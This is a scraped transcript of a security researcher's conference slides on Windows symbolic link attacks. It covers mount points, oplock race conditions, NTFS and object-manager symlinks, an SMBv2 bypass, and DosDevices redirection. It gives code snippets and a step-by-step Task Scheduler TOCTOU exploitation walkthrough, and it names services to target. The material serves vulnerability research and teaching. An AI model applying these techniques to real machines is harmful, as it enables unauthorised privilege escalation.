  • 42. James Forshaw @tiraniddo Under the hood 42 NtOpenFile ObOpenObjectByName ObpLookupObjectName IopParseDevice NTFS Driver STATUS_REPARSE Parsing Name ??C:Windowsfile
  • 43. James Forshaw @tiraniddo Structure of a Mount Point typedef struct MOUNT_POINT_REPARSE_BUFFER { ULONG ReparseTag; USHORT ReparseDataLength; USHORT Reserved; USHORT SubstituteNameOffset; USHORT SubstituteNameLength; USHORT PrintNameOffset; USHORT PrintNameLength; WCHAR PathBuffer[1]; }; 43 Set to 0xA0000003 for Mount Point Substitute NT Name Print Name? String Data Header Reparse Data
  • 44. James Forshaw @tiraniddo Create a Mount Point PREPARSE_DATA_BUFFER reparse_buffer = BuildMountPoint(target); CreateDirectory(dir); HANDLE handle = CreateFile(dir, ..., FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, ...); DeviceIoControl(handle, FSCTL_SET_REPARSE_POINT, reparse_buffer, reparse_buffer.size(), ...); 44
  • 45. James Forshaw @tiraniddo Mount Point Limitations ● Directory must be empty to set the reparse data ● Target device must be an IO device (no opening registry keys for example) ● Target device heavily restricted in IopParseDevice: 45 IO_PARSE_CONTEXT *ctx; if (ctx->LastReparseTag == IO_REPARSE_TAG_MOUNT_POINT) { switch(TargetDeviceType) { case FILE_DEVICE_DISK: case FILE_DEVICE_CD_ROM: case FILE_DEVICE_VIRTUAL_DISK: case FILE_DEVICE_TAPE: break; default: return STATUS_IO_REPARSE_DATA_INVALID; } } Limited Device Subset
  • 46. James Forshaw @tiraniddo Example Vulnerability Windows Task Scheduler TOCTOU Arbitrary File Creation 46
  • 47. James Forshaw @tiraniddo Running a Scheduled Task 47 void Load_Task_File(string task_name, string orig_hash) { string task_path = "c:windowssystem32tasks" + task_name; string file_hash = Hash_File(task_path); if (file_hash != orig_hash) { Rewrite_Task_File(task_path); } } Hash task file contents Rewrite Task without Impersonation
  • 48. James Forshaw @tiraniddo System Task Folder Writable from normal user privilege, therefore can create a mount point directory 48
  • 49. James Forshaw @tiraniddo Winning the Race Condition 49 Hash File Rewrite Task File ???? Profit?
  • 50. James Forshaw @tiraniddo Is that an OPLOCK in your Pocket? void SetOplock(HANDLE hFile) { REQUEST_OPLOCK_INPUT_BUFFER inputBuffer; REQUEST_OPLOCK_OUTPUT_BUFFER outputBuffer; OVERLAPPED overlapped; overlapped.hEvent = CreateEvent(...); DeviceIoControl(hFile, FSCTL_REQUEST_OPLOCK, &inputBuffer, sizeof(inputBuffer), &outputBuffer, sizeof(outputBuffer), nullptr, &overlapped); WaitForSingleObject(overlapped.hEvent, ...); } 50
  • 51. James Forshaw @tiraniddo User Application Exploitation Task Scheduler Service 51 IRegisteredTask::Run Current Mount Point: MyTaskFolder → C:dummy Open File for Reading C:DummyMyTask
  • 52. James Forshaw @tiraniddo User Application Exploitation Task Scheduler Service 52 IRegisteredTask::Run Current Mount Point: MyTaskFolder → C:windows Open File for Reading C:DummyMyTask Change Mount Point Location Event Set
  • 53. James Forshaw @tiraniddo User Application Exploitation Task Scheduler Service 53 IRegisteredTask::Run Current Mount Point: MyTaskFolder → C:windows Open File for Reading C:DummyMyTask Release Oplock Change Mount Point Location Event Set
  • 54. James Forshaw @tiraniddo User Application Exploitation Task Scheduler Service 54 IRegisteredTask::Run Current Mount Point: MyTaskFolder → C:windows Open File for Reading C:DummyMyTask Generate and Verify Hash of File C:DummyMyTask Release Oplock Change Mount Point Location Event Set
  • 55. James Forshaw @tiraniddo User Application Exploitation Task Scheduler Service 55 IRegisteredTask::Run Current Mount Point: MyTaskFolder → C:windows Open File for Reading C:DummyMyTask Rewrite Task File C:WindowsMyTask Generate and Verify Hash of File C:DummyMyTask Release Oplock Change Mount Point Location Event Set
  • 56. James Forshaw @tiraniddo OPLOCK Limitations ● Can’t block on access to standard attributes or FILE_READ_ATTRIBUTES ● One-shot, need to be quick to reestablish if opened multiple times ● Can get around attribute reading in certain circumstances by oplocking a directory. ● For example these scenarios opens directories for read access ○ Shell SHParseDisplayName accesses each directory in path ○ GetLongPathName or GetShortPathName ○ FindFirstFile/FindNextFile 56
  • 58. James Forshaw @tiraniddo NTFS Symbolic Links 58
  • 59. James Forshaw @tiraniddo Structure of a Symbolic Link typedef struct SYMLINK_REPARSE_BUFFER { ULONG ReparseTag; USHORT ReparseDataLength; USHORT Reserved; USHORT SubstituteNameOffset; USHORT SubstituteNameLength; USHORT PrintNameOffset; USHORT PrintNameLength; USHORT Flags; WCHAR PathBuffer[1]; }; 59 Set to 0xA000000C for SymlinkHeader Reparse Data Flags: 0 - Absolute path 1 - Relative path
  • 60. James Forshaw @tiraniddo Create Symlink Privilege Admin user - Yay! Normal user - Boo :-( 60
  • 61. James Forshaw @tiraniddo Create Symbolic Link Privilege NTSTATUS NtfsSetReparsePoint(NTFS_CREATE_CONTEXT* ctx) { // Validation ... PREPARSE_DATA_BUFFER* reparse_buf; if ((reparse_buf->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) && (ctx->Type != FILE_DIRECTORY)) { return STATUS_NOT_A_DIRECTORY; } if ((reparse_buf->ReparseTag == IO_REPARSE_SYMLINK) && ((ctx->Flags & 0x400) == 0)) { return STATUS_ACCESS_DENIED } // ... } 61
  • 62. James Forshaw @tiraniddo Create Symbolic Link Privilege NTSTATUS NtfsSetReparsePoint(NTFS_CREATE_CONTEXT* ctx) { // Validation ... PREPARSE_DATA_BUFFER* reparse_buf; if ((reparse_buf->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) && (ctx->Type != FILE_DIRECTORY)) { return STATUS_NOT_A_DIRECTORY; } if ((reparse_buf->ReparseTag == IO_REPARSE_SYMLINK) && ((ctx->Flags & 0x400) == 0)) { return STATUS_ACCESS_DENIED } // ... } Context must contain 0x400 flag 62
  • 63. James Forshaw @tiraniddo Flags Setting NTSTATUS NtfsSetCcbAccessFlags(NTFS_FILE_CONTEXT* ctx) { ACCESS_MODE AccessMode = NtfsEffectiveMode(); if (ctx->HasRestorePrivilege) { ctx->Flags |= 0x400; } if (AccessMode == KernelMode || SeSinglePrivilegeCheck(&SeCreateSymbolicLinkPrivilege, &security_ctx, UserMode)) { ctx->Flags |= 0x400; } // ... } 63
  • 64. James Forshaw @tiraniddo Hypothetical Scenario NTSTATUS Handle_OpenLog(PIRP Irp) { OBJECT_ATTRIBUTES objattr; UNICODE_STRING name; RtlInitUnicodeString(&name, L"SystemRootLogFilesuser.log"); InitObjectAttributes(&objattr, &name, 0, 0, 0, 0); PHANDLE Handle = Irp->AssociatedIrp->SystemBuffer; return ZwCreateFile(Handle, &objattr, ...); } 64 Returns handle to user mode process
  • 65. James Forshaw @tiraniddo 65 SMBv2 Symbolic Links https://msdn.microsoft.com/en-us/library/cc246542.aspx
  • 66. James Forshaw @tiraniddo SMBv2 Symbolic Link Restrictions 66 ● Remote to Local would be useful ● Disabled by default in local security policy
  • 67. James Forshaw @tiraniddo Back to IopParseDevice enum SymlinkDeviceType { Local, Network }; if (ctx->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) { // ... } else { SymlinkDeviceType target_type = GetSymlinkDeviceType(TargetDeviceType); if (target_type == Local || target_type == Network) { if (!NT_SUCCESS(IopSymlinkEnforceEnabledTypes( target_type, ctx->last_target_type))) { return STATUS_IO_REPARSE_DATA_INVALID; } } } 67 Enforces Symlink Traversal based on device types
  • 68. James Forshaw @tiraniddo MRXSMB20 NTSTATUS Smb2Create_Finalize(SMB_CONTEXT* ctx) { // Make request and get response if (RequestResult == STATUS_STOPPED_ON_SYMLINK) { result = FsRtlValidateReparsePointBuffer( ctx->ErrorData, ctx->ErrorDataLength); if (!NT_SUCCESS(result)) { return result; } } // ... } 68 No check on ReparseTag
  • 69. James Forshaw @tiraniddo SMBv2 Device Type Bypass 69 NtOpenFile ObpLookupObjectName IopParseDevice SMB2 Driver Parsing Name serversharefile Current Component Server Create sharefile
  • 70. James Forshaw @tiraniddo SMBv2 Device Type Bypass 70 NtOpenFile ObpLookupObjectName IopParseDevice SMB2 Driver STATUS_REPARSE Parsing Name serversharefile Current Component Server STATUS_STOPPED_ON_SYMLINK with IO_REPARSE_TAG_MOUNT_POINT
  • 71. James Forshaw @tiraniddo SMBv2 Device Type Bypass 71 NtOpenFile ObpLookupObjectName IopParseDevice SMB2 Driver Parsing Name serversharefile ??C:hello.txt Server NTFS Driver
  • 72. James Forshaw @tiraniddo DEMO 72 SMBv2 Local File Disclosure in IE
  • 73. James Forshaw @tiraniddo File Symbolic Links - Without Permissions 73
  • 74. James Forshaw @tiraniddo First Try Default CreateFile call won’t open the file. Returns Access Denied 74
  • 76. James Forshaw @tiraniddo The NtCreateFile Paradox FILE_DIRECTORY_FILE Flag FILE_NON_DIRECTORY_FILE Flag 76 Neither FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE
  • 77. James Forshaw @tiraniddo The Old ADS Directory Trick Using $INDEX_ALLOCATION stream will bypass initial directory failure 77
  • 78. James Forshaw @tiraniddo Let Our Powers Combine 78
  • 79. James Forshaw @tiraniddo Let Our Powers Combine 79 NtOpenFile ObpLookupObjectName IopParseDevice Parsing Name ??C:tempmylink RPC Controlmylink NTFS Driver STATUS_REPARSE
  • 80. James Forshaw @tiraniddo 80 NtOpenFile ObpLookupObjectName IopParseDevice NTFS Driver ObpParseSymbolicLink STATUS_REPARSE Parsing Name RPC Controlmylink ??C:hello.txt Let Our Powers Combine
  • 81. James Forshaw @tiraniddo Persisting the Symlink ● Might be useful to persist the symlink between login sessions ● Can’t pass OBJ_PERMANENT directly ○ Needs SeCreatePermanentPrivilege ● Get CSRSS to do it for us :-) 81 DefineDosDeviceW( DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, L"GLOBALROOTRPC Controlmylink", L"TargetPath" );
  • 82. James Forshaw @tiraniddo Combined Symbolic Link Limitations ● All existing limitations of Mount Points apply ● Vulnerable application can’t try to list or inspect the mount point itself ○ Listing the directory ○ Open for GetFileAttributes or similar ● Can mitigate somewhat by clever tricks with oplocks on directory hierarchy 82
  • 86. James Forshaw @tiraniddo DosDevice Prefix 86 ??c:somepath THE PREFIX IS A LIE
  • 87. James Forshaw @tiraniddo DosDevice Prefix 87 Sessions0DosDevicesX-Yc:somepath ??c:somepath
  • 88. James Forshaw @tiraniddo DosDevice Prefix 88 Sessions0DosDevicesX-Yc:somepath ??c:somepath GLOBAL??c:somepath
  • 90. James Forshaw @tiraniddo Windows User Impersonation 90
  • 91. James Forshaw @tiraniddo Very Exploitable Behaviour 91 void ExploitableFunction() { ImpersonateLoggedOnUser(hToken); LoadLibrary("c:secure.dll"); RevertToSelf(); } c:secure.dll
  • 92. James Forshaw @tiraniddo Very Exploitable Behaviour 92 void ExploitableFunction() { ImpersonateLoggedOnUser(hToken); LoadLibrary("c:secure.dll"); RevertToSelf(); } c:secure.dll ??c:secure.dll
  • 93. James Forshaw @tiraniddo Very Exploitable Behaviour 93 void ExploitableFunction() { ImpersonateLoggedOnUser(hToken); LoadLibrary("c:secure.dll"); RevertToSelf(); } c:secure.dll ??c:secure.dll Sessions0DosDevicesX-Yc:secure.dll
  • 94. James Forshaw @tiraniddo Very Exploitable Behaviour 94 void ExploitableFunction() { ImpersonateLoggedOnUser(hToken); LoadLibrary("c:secure.dll"); RevertToSelf(); } c:secure.dll ??c:secure.dll Sessions0DosDevicesX-Yc:secure.dll c:somearbitrary.dll
  • 95. James Forshaw @tiraniddo Very Exploitable Behaviour 95 void ExploitableFunction() { ImpersonateLoggedOnUser(hToken); LoadLibrary("secure.dll"); RevertToSelf(); } void COMExploitableFunction() { ImpersonateLoggedOnUser(hToken); CoCreateInstance(CLSID_SecureObject, ...); RevertToSelf(); }
  • 96. James Forshaw @tiraniddo Finding an Ideal Service 96 Requirement Spooler Service Runs as NT AUTHORITYSYSTEM Yup Uses impersonation Definitely Accessible by normal user Kind of the point Has a habit of loading DLLs Think of all the printer drivers
  • 98. James Forshaw @tiraniddo Links and References ● Symlink Testing Tools https://github.com/google/symboliclink-testing-tools ● File Test Application https://github.com/ladislav-zezula/FileTest 98